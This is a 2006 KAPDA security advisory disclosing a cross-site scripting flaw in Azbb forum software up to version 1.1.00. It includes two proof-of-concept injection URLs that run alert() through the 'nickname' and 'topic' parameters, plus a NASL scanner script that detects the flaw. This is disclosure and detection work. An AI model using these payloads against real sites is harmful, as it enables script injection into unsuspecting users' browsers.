kapda-22.txt

`[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting  
  
KAPDA New advisory  
  
Vulnerable products : Azbb <= 1.1.00  
Vendor: www.azbb.org  
Risk: Low  
Vulnerabilities: Cross Site Scripting  
  
Date :  
--------------------  
Found : Jan 20 2006  
Vendor Contacted : Jan 21 2006  
Release Date : Jan 21 2006  
  
About :  
--------------------  
AZbb is "a forum that was written with a primary focus on security.  
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can even be used as a blog, or a portal".  
  
  
Vulnerability:  
--------------------  
Cross_Site_Scripting (XSS,CSS):  
  
AZ Bulletin Board is affected by a cross-site scripting vulnerability.  
This issue is due to the failure of the application to properly sanitize user-supplied input.  
  
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed.  
  
  
PoC :  
--------------------  
  
1)  
  
This flaw exists because the application does not validate the "nickname" variable upon submission to the post.php script via the POST method.  
  
h**p://www.[target]/post.php?nickname="><script>alert('XSS')</script><!--  
  
  
  
2)[limited XSS]  
  
h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"  
  
  
NASL :  
--------------------  
azbb_1100_XSS.nasl  
#  
# This script was written by Pedram Hayati <pi3ch at kapda dot ir>  
# (C) KAPDA Computer Security Science Researchers Institute  
# http://www.kapda.ir  
#  
# This script is released under the GNU GPL v2  
  
if(description)  
{  
script_version ("$Revision: 1.0 $");  
name["english"] = "Azbb XSS";  
  
script_name(english:name["english"]);  
  
desc["english"] = "  
The 'AZ Bulletin Board' PHP is installed. This version is affected by a  
cross-site scripting vulnerability. This issue is due to a failure  
of the application to properly sanitize user-supplied input.  
  
As a result of this vulnerability, it is possible for a remote attacker  
to create a malicious link containing script code that will be executed  
in the browser of an unsuspecting user when followed.  
Original Advisory: http://kapda.ir/advisory-236.html  
Solution : Vendor contacted  
Risk factor : Low";  
  
script_description(english:desc["english"]);  
  
summary["english"] = "Checks post.php XSS";  
  
script_summary(english:summary["english"]);  
  
script_category(ACT_GATHER_INFO);  
  
  
script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");  
  
family["english"] = "CGI abuses : XSS";  
family["francais"] = "Abus de CGI";  
script_family(english:family["english"], francais:family["francais"]);  
script_dependencie("cross_site_scripting.nasl");  
script_require_ports("Services/www", 80);  
exit(0);  
}  
  
#  
# The script code starts here  
#  
  
include("http_func.inc");  
include("http_keepalive.inc");  
  
port = get_http_port(default:80);  
  
if (!get_port_state(port))exit(0);  
  
if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);  
  
foreach dir (cgi_dirs())  
{  
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");  
req = http_get(item:req, port:port);  
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);  
if( r == NULL )exit(0);  
if (egrep(pattern:"javascript:alert()", string:r))  
{  
security_warning(port);  
exit(0);  
}  
}  
exit(0);  
  
Solution :  
--------------------  
N/A  
  
Original Advisory :  
--------------------  
http://kapda.ir/advisory-236.html  
  
Credit :  
--------------------  
Discoverd by Roozbeh Afrasiabi  
roozbeh_afrasiabi {a] yahoo.com  
black_death {a] kapda.ir  
www.persiax.com [currently down]  
  
NASL Script by pi3ch {a] kapda.ir  
KAPDA - Institute for Computer Security Researchers  
http://www.KAPDA.ir  
`